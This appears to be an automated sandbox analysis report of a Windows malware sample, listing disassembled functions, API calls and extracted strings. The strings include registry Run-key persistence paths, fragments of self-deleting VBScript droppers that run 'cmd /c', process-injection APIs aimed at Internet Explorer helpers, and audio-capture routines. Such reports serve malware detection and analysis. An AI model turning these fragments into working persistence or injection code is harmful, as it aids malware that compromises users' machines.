                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                                                          • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                          • API String ID: 4188446516-3035715614
                                                                                          • Opcode ID: 5b7e1e0f0ab70bb274c8e1cba5061de31cdd1b1bc4dd29beedf5b9f83fbb8038
                                                                                          • Instruction ID: 94204e0ceb90eb3d518cc699b6b418d02f123724867831e7a48fec904b930286
                                                                                          • Opcode Fuzzy Hash: 5b7e1e0f0ab70bb274c8e1cba5061de31cdd1b1bc4dd29beedf5b9f83fbb8038
                                                                                          • Instruction Fuzzy Hash: 9CA18E71604300AFDB109F64DC85F6B7BE8FB48749F00092AF695D62A1E7B8EC44CB5A
                                                                                          Function 0040BFDE Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 281registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,?,0040C3C8), ref: 004112C5
                                                                                            • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF,?,0040C3C8), ref: 004112D8
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C0D6
                                                                                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C0E9
                                                                                          • SetFileAttributesW.KERNEL32(?,00000080), ref: 0040C102
                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040C132
                                                                                            • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(00409305,00000000,004721E8,0040BC76,?,00472200,pth_unenc,004721E8), ref: 0040A801
                                                                                            • Part of subcall function 0040A7F2: UnhookWindowsHookEx.USER32(?), ref: 0040A811
                                                                                            • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(004092EF,00000000,?,00472200,pth_unenc,004721E8), ref: 0040A823
                                                                                            • Part of subcall function 0041A17B: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041A29A,00000000,00000000,00000000), ref: 0041A1BA
                                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040C37D
                                                                                          • ExitProcess.KERNEL32 ref: 0040C389
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                          • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$H"G$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$t<F$wend$while fso.FileExists("
                                                                                          • API String ID: 1861856835-1953526029
                                                                                          • Opcode ID: 10d0c7ff4f1d806eef4ddcd080fba36a068473baf966d624ed17e78b73616814
                                                                                          • Instruction ID: 20f5f97700cb48a3d0b4a42ff25d793d854bdbfc6fb2dd54058f707cc559a17d
                                                                                          • Opcode Fuzzy Hash: 10d0c7ff4f1d806eef4ddcd080fba36a068473baf966d624ed17e78b73616814
                                                                                          • Instruction Fuzzy Hash: 579180712042405AC314FB62D8929EF77E99F90708F50453FB586B31E3EE789E49C69E
                                                                                          Function 00410EDA Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 190synchronizationsleepfileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateMutexA.KERNEL32(00000000,00000001,00000000,00472200,00471FFC,00000000), ref: 00410EF9
                                                                                          • ExitProcess.KERNEL32(00000000), ref: 00410F05
                                                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00410F7F
                                                                                          • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00410F8E
                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00410F99
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00410FA0
                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00410FA6
                                                                                          • PathFileExistsW.SHLWAPI(?), ref: 00410FD7
                                                                                          • GetTempPathW.KERNEL32(00000104,?), ref: 0041103A
                                                                                          • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 00411054
                                                                                          • lstrcatW.KERNEL32(?,.exe), ref: 00411066
                                                                                            • Part of subcall function 0041A17B: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041A29A,00000000,00000000,00000000), ref: 0041A1BA
                                                                                          • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 004110A6
                                                                                          • Sleep.KERNEL32(000001F4), ref: 004110E7
                                                                                          • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004110FC
                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00411107
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0041110E
                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00411114
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                                                          • String ID: (#G$.exe$H"G$WDH$exepath$open$temp_
                                                                                          • API String ID: 2649220323-71629269
                                                                                          • Opcode ID: 2d259c07ed95d09e60fa5efe04e2d1ca5b77bcbd3679d1c800de5877fac34894
                                                                                          • Instruction ID: 69aa2ac3f34532c799e46254488c9bc95b38e37df126af38d98eea17990f3aaa
                                                                                          • Opcode Fuzzy Hash: 2d259c07ed95d09e60fa5efe04e2d1ca5b77bcbd3679d1c800de5877fac34894
                                                                                          • Instruction Fuzzy Hash: 9D51A671A003196BDF10A7A09C59EEE336D9B04715F5041BBF605A31E2EFBC8E86875D
                                                                                          Function 0040B871 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 296fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _wcslen.LIBCMT ref: 0040B882
                                                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00471FFC), ref: 0040B89B
                                                                                          • CopyFileW.KERNEL32(0046FB08,00000000,00000000,00000000,00000000,00000000,?,00471FFC), ref: 0040B952
                                                                                          • _wcslen.LIBCMT ref: 0040B968
                                                                                          • CopyFileW.KERNEL32(0046FB08,00000000,00000000,00000000), ref: 0040B9E0
                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BA22
                                                                                          • _wcslen.LIBCMT ref: 0040BA25
                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BA3C
                                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040BC2A
                                                                                          • ExitProcess.KERNEL32 ref: 0040BC36
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$_wcslen$AttributesCopy$CreateDirectoryExecuteExitProcessShell
                                                                                          • String ID: """, 0$6$CreateObject("WScript.Shell").Run "cmd /c ""$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open$!G$!G
                                                                                          • API String ID: 2743683619-2376316431
                                                                                          • Opcode ID: 2d8f1c55d0f0c7d88b14490434e7e409f023ec492faccedf176980d1ad0b2fd8
                                                                                          • Instruction ID: 1f37921bc36cc04280d9be7a1af933bc03f5727a4608831148a2c1203a4a5f71
                                                                                          • Opcode Fuzzy Hash: 2d8f1c55d0f0c7d88b14490434e7e409f023ec492faccedf176980d1ad0b2fd8
                                                                                          • Instruction Fuzzy Hash: CA9161712083415BC218F766DC92EAF77D8AF90708F50043FF546A61E2EE7C9A49C69E
                                                                                          Function 0040BC59 Relevance: 38.8, APIs: 6, Strings: 16, Instructions: 259registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,?,0040C3C8), ref: 004112C5
                                                                                            • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF,?,0040C3C8), ref: 004112D8
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BD63
                                                                                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040BD76
                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BDA6
                                                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BDB5
                                                                                            • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(00409305,00000000,004721E8,0040BC76,?,00472200,pth_unenc,004721E8), ref: 0040A801
                                                                                            • Part of subcall function 0040A7F2: UnhookWindowsHookEx.USER32(?), ref: 0040A811
                                                                                            • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(004092EF,00000000,?,00472200,pth_unenc,004721E8), ref: 0040A823
                                                                                            • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040405C), ref: 00419980
                                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040BFD0
                                                                                          • ExitProcess.KERNEL32 ref: 0040BFD7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                          • String ID: ")$.vbs$H"G$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                                                          • API String ID: 3797177996-2974882535
                                                                                          • Opcode ID: 631efead2f1a7aa74ba651dc5d5e4e8b052369c469df6eda5620e8cdf42f0076
                                                                                          • Instruction ID: 6c8f8b33712d81dc7036d24bc004af62d002185c7e194acf753e7914dc64dab3
                                                                                          • Opcode Fuzzy Hash: 631efead2f1a7aa74ba651dc5d5e4e8b052369c469df6eda5620e8cdf42f0076
                                                                                          • Instruction Fuzzy Hash: DD816E716042405AC714FB62D8929EF77A8AF90708F10443FF586A71E2EF789E49C69E
                                                                                          Function 00418FFD Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 180synchronizationCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 004190F2
                                                                                          • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 00419106
                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00463050), ref: 0041912E
                                                                                          • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00471E78,00000000), ref: 00419144
                                                                                          • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00419185
                                                                                          • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041919D
                                                                                          • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 004191B2
                                                                                          • SetEvent.KERNEL32 ref: 004191CF
                                                                                          • WaitForSingleObject.KERNEL32(000001F4), ref: 004191E0
                                                                                          • CloseHandle.KERNEL32 ref: 004191F0
                                                                                          • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00419212
                                                                                          • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041921C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                          • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                                                                          • API String ID: 738084811-1354618412
                                                                                          • Opcode ID: 86fd4772b83d80fa8e497525ba6a2bc9e4fac7079830c2c2d6cb57e0af13d410
                                                                                          • Instruction ID: 6660e32d934ed13bda46fa62e77153e47455c80990ba371f4f5bcee5a70a39dd
                                                                                          • Opcode Fuzzy Hash: 86fd4772b83d80fa8e497525ba6a2bc9e4fac7079830c2c2d6cb57e0af13d410
                                                                                          • Instruction Fuzzy Hash: 6C5191712043056BD604FB75DC96EBF369CDB81398F10053FF44A621E2EE789D898A6E
                                                                                          Function 00401A4D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9
                                                                                          • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401AE3
                                                                                          • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401AF3
                                                                                          • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B03
                                                                                          • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B13
                                                                                          • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B23
                                                                                          • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B34
                                                                                          • WriteFile.KERNEL32(00000000,0046FA9A,00000002,00000000,00000000), ref: 00401B45
                                                                                          • WriteFile.KERNEL32(00000000,0046FA9C,00000004,00000000,00000000), ref: 00401B55
                                                                                          • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B65
                                                                                          • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B76
                                                                                          • WriteFile.KERNEL32(00000000,0046FAA6,00000002,00000000,00000000), ref: 00401B87
                                                                                          • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401B97
                                                                                          • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BA7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$Write$Create
                                                                                          • String ID: RIFF$WAVE$data$fmt
                                                                                          • API String ID: 1602526932-4212202414
                                                                                          • Opcode ID: e953cdad80a2b5f15463d19f06cbbe214ca4708b9acf4e214683fef01c63ba87
                                                                                          • Instruction ID: fa9573d22dfebaa7cc70b9682dc8642ba3498ee27ac2ec60dc87a96e6c13d219
                                                                                          • Opcode Fuzzy Hash: e953cdad80a2b5f15463d19f06cbbe214ca4708b9acf4e214683fef01c63ba87
                                                                                          • Instruction Fuzzy Hash: 46416F726543197AE210DB91DD85FBB7EECEB85B50F40042AF648D6080E7A4E909DBB3
                                                                                          Function 004137DC Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 109libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0041382B
                                                                                          • LoadLibraryA.KERNEL32(?), ref: 0041386D
                                                                                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0041388D
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00413894
                                                                                          • LoadLibraryA.KERNEL32(?), ref: 004138CC
                                                                                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 004138DE
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 004138E5
                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 004138F4
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 0041390B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                          • String ID: \ws2_32$\wship6$`3A$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                          • API String ID: 2490988753-3443138237
                                                                                          • Opcode ID: 21b812c9e8c8c8e619d1227956d82128857f9ec353fd6b4c7c84cf26c4fc7a8e
                                                                                          • Instruction ID: d28fd91e0c22c3548fe93de424e57890752fc739e59a71d3c7449bb4191d4936
                                                                                          • Opcode Fuzzy Hash: 21b812c9e8c8c8e619d1227956d82128857f9ec353fd6b4c7c84cf26c4fc7a8e
                                                                                          • Instruction Fuzzy Hash: 8831C0B2502315ABC720AF25DC489CBBBEC9F48755F41062AF84593251E7B8CE8486AE
                                                                                          Function 0044C60D Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _free$EnvironmentVariable$_wcschr
                                                                                          • String ID:
                                                                                          • API String ID: 3899193279-0
                                                                                          • Opcode ID: 7152c14c9f043405eb9b9a37d5c5f1e16380f97c3d25ee63cda43d2d9904c190
                                                                                          • Instruction ID: f90cfe9d57a3c7213274ca364bab7ea13f4483d5bd7e80e8c07ab134bc70d503
                                                                                          • Opcode Fuzzy Hash: 7152c14c9f043405eb9b9a37d5c5f1e16380f97c3d25ee63cda43d2d9904c190
                                                                                          • Instruction Fuzzy Hash: 80D136719023007BFB60AF7598C166B7BA4AF15718F09817FF985A7381FB3989008B5D
                                                                                          Function 0044E4A6 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ___free_lconv_mon.LIBCMT ref: 0044E4EA
                                                                                            • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D6FF
                                                                                            • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D711
                                                                                            • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D723
                                                                                            • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D735
                                                                                            • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D747
                                                                                            • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D759
                                                                                            • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D76B
                                                                                            • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D77D
                                                                                            • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D78F
                                                                                            • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7A1
                                                                                            • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7B3
                                                                                            • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7C5
                                                                                            • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7D7
                                                                                          • _free.LIBCMT ref: 0044E4DF
                                                                                            • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                                                                            • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                                                                          • _free.LIBCMT ref: 0044E501
                                                                                          • _free.LIBCMT ref: 0044E516
                                                                                          • _free.LIBCMT ref: 0044E521
                                                                                          • _free.LIBCMT ref: 0044E543
                                                                                          • _free.LIBCMT ref: 0044E556
                                                                                          • _free.LIBCMT ref: 0044E564
                                                                                          • _free.LIBCMT ref: 0044E56F
                                                                                          • _free.LIBCMT ref: 0044E5A7
                                                                                          • _free.LIBCMT ref: 0044E5AE
                                                                                          • _free.LIBCMT ref: 0044E5CB
                                                                                          • _free.LIBCMT ref: 0044E5E3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                          • String ID: pF
                                                                                          • API String ID: 161543041-2973420481
                                                                                          • Opcode ID: b166b7e86ef1a7ddfa2e36ec319a6e916c21ca5d81851e2e5517d42b5c42f7b7
                                                                                          • Instruction ID: 6e8371ae3b83bc2427c047bff221b97f6cd80994471b0a2caeb41cff5b169df7
                                                                                          • Opcode Fuzzy Hash: b166b7e86ef1a7ddfa2e36ec319a6e916c21ca5d81851e2e5517d42b5c42f7b7
                                                                                          • Instruction Fuzzy Hash: D4315072500304AFFB205E7AD945B5BB3E5BF00719F55851FE488D6251EE39ED408B18
                                                                                          Function 00411899 Relevance: 23.2, APIs: 9, Strings: 4, Instructions: 417sleepfileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 004118B2
                                                                                            • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040405C), ref: 00419980
                                                                                            • Part of subcall function 004168A6: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00462E24), ref: 004168BC
                                                                                            • Part of subcall function 004168A6: CloseHandle.KERNEL32($.F,?,?,004040D5,00462E24), ref: 004168C5
                                                                                          • Sleep.KERNEL32(0000000A,00462E24), ref: 00411A01
                                                                                          • Sleep.KERNEL32(0000000A,00462E24,00462E24), ref: 00411AA3
                                                                                          • Sleep.KERNEL32(0000000A,00462E24,00462E24,00462E24), ref: 00411B42
                                                                                          • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411B9F
                                                                                          • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411BCF
                                                                                          • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411C05
                                                                                          • Sleep.KERNEL32(000001F4,00462E24,00462E24,00462E24), ref: 00411C25
                                                                                          • Sleep.KERNEL32(00000064), ref: 00411C63
                                                                                            • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                          • String ID: /stext "$$.F$@#G$@#G
                                                                                          • API String ID: 1223786279-2596709126
                                                                                          • Opcode ID: bd53cf9864bd20e9c524ce1cfd37af81de888470282f81bcb092bebe0936cb7c
                                                                                          • Instruction ID: f36e1428a9e5a2dc2e21cca38a330b771dfaab2ce7ac60874593ee94e899fa44
                                                                                          • Opcode Fuzzy Hash: bd53cf9864bd20e9c524ce1cfd37af81de888470282f81bcb092bebe0936cb7c
                                                                                          • Instruction Fuzzy Hash: 1CF154311083415AD328FB65D896AEFB3D5AFD0348F40093FF586521E2EF789A4DC69A
                                                                                          Function 0044D7E0 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 376COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _free
                                                                                          • String ID: pF
                                                                                          • API String ID: 269201875-2973420481
                                                                                          • Opcode ID: 2d61484940682ee786660686f26dc7be5fdbe1d580820abb244bed0f912383bb
                                                                                          • Instruction ID: 42ad863364e9847d0c0ab7d3fc56807329b255bf3c924c15ca724e031f0c4a7b
                                                                                          • Opcode Fuzzy Hash: 2d61484940682ee786660686f26dc7be5fdbe1d580820abb244bed0f912383bb
                                                                                          • Instruction Fuzzy Hash: 4CC17576D40204ABEB20DFA9CC82FEE77F8AF09B05F154156FE04FB282D674A9458754
                                                                                          Function 0040DE34 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 223processsynchronizationCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00472248,00471FFC,?,00000001), ref: 0040DE4E
                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000001), ref: 0040DE79
                                                                                          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040DE95
                                                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040DF14
                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000001), ref: 0040DF23
                                                                                            • Part of subcall function 00419F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00419F9C
                                                                                          • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001), ref: 0040E047
                                                                                          • CloseHandle.KERNEL32(00000000,C:\Program Files(x86)\Internet Explorer\,?,00000001), ref: 0040E133
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseCreateHandleProcess32$FileFirstModuleMutexNameNextOpenProcessSnapshotToolhelp32
                                                                                          • String ID: 0"G$C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$!G
                                                                                          • API String ID: 193334293-3226144251
                                                                                          • Opcode ID: cf6d12ac23d3bea58c4b9e5c443ef1de1d55369046223e9cec53eb66751e9ba7
                                                                                          • Instruction ID: 8a3cf51a80cb2752f7e3b1027b115d9c77e2b7a511041fa54b012784d9d6af0a
                                                                                          • Opcode Fuzzy Hash: cf6d12ac23d3bea58c4b9e5c443ef1de1d55369046223e9cec53eb66751e9ba7
                                                                                          • Instruction Fuzzy Hash: DB8121305083419BCA54FB61D8919EEB7E4AFA0348F40493FF586631E2EF78994DC75A
                                                                                          Function 0041B344 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041B38F
                                                                                          • GetCursorPos.USER32(?), ref: 0041B39E
                                                                                          • SetForegroundWindow.USER32(?), ref: 0041B3A7
                                                                                          • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041B3C1
                                                                                          • Shell_NotifyIconA.SHELL32(00000002,00471AE0), ref: 0041B412
                                                                                          • ExitProcess.KERNEL32 ref: 0041B41A
